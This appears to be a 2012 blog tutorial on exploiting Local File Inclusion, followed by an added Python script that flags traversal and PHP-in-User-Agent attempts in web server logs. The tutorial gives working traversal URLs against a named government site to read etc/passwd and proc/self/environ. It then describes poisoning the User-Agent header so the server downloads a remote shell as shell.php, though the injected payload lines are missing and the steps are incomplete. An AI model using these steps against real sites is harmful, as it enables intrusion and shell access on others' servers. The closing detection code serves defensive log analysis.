Monday 18 June 2012

LFI (Local File Inclusion) Tutorial



REQUIREMENTS:

1) Site vulnerable to LFI
2) Remote shell (http://www.yourhosting/urshell.txt)
3) User-Agent switcher (https://addons.mozilla.org/en-US/firefox...-switcher/)
4) Mozilla Firefox Browser

First of all, check whether your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it).
Try to open etc/passwd.
Example: http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
OK, fine. We can open etc/passwd.
Now try proc/self/environ.

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents.

Now make a new user agent: go to New > New User-Agent.

Now leave everything as it is except the description and the user agent.
In the description, enter a name for it (mine is phpinfo).
In User-Agent, paste this in there.
Select your user agent in Tools > Default User Agent > PHP Info (or whatever your user agent is called).

Go to your site and refresh it.

Now search for "disable_functions" (Ctrl+F Search function)

Now go back and edit your User-Agent.
Change "User-Agent" to:

(What does this function do? It downloads the shell in .txt format and renames it to shell.php.)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php
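
The steps above leave two signals in web server access logs: traversal sequences reaching etc/passwd or proc/self/environ in a query parameter, and PHP code in the User-Agent header. The Python below is an added detection example, not part of the original post; the combined log format, the `sample_line` helper, the documentation IP address and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format (assumed for this example).
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>.*)"$')
TRAVERSAL_RE = re.compile(r'(?:\.\.[/\\]){2,}')   # repeated ../ or ..\
SENSITIVE_RE = re.compile(r'/(?:etc/passwd|proc/self/environ)', re.I)
PHP_TAG_RE = re.compile(r'<\?')                   # PHP open tag inside a header

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ sequences are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a sorted list of finding names for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    target, ua = decode(m["target"]), decode(m["ua"])
    hits = {"path-traversal": TRAVERSAL_RE.search(target),
            "sensitive-file": SENSITIVE_RE.search(target),
            "php-in-user-agent": PHP_TAG_RE.search(ua)}
    findings = [name for name, hit in hits.items() if hit]
    if findings and m["status"] == "200":
        findings.append("served-200")  # not rejected by the server: triage first
    return sorted(findings)

def sample_line(target, status, ua="Mozilla/5.0"):
    """Build one constructed log line (documentation IP, made-up size)."""
    return (f'198.51.100.7 - - [18/Jun/2012:10:00:01 +0000] '
            f'"GET {target} HTTP/1.1" {status} 512 "-" "{ua}"')

SAMPLE = [  # constructed sample input, not real traffic
    sample_line("/content1.php?page=5&directLinks=../../../../etc/passwd", 200),
    sample_line("/content1.php?page=5&directLinks=%252e%252e%252f%252e%252e%252f"
                "proc%252fself%252fenviron", 200, "<?php /* placeholder */ ?>"),
    sample_line("/content1.php?page=5", 200),
    sample_line("/content1.php?page=5&directLinks=..%2f..%2fetc%2fpasswd", 403),
]

if __name__ == "__main__":
    print(*map(classify, SAMPLE), sep="\n")
```

A line tagged both `php-in-user-agent` and `served-200` is the one to investigate first, since it means the request was answered rather than blocked.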
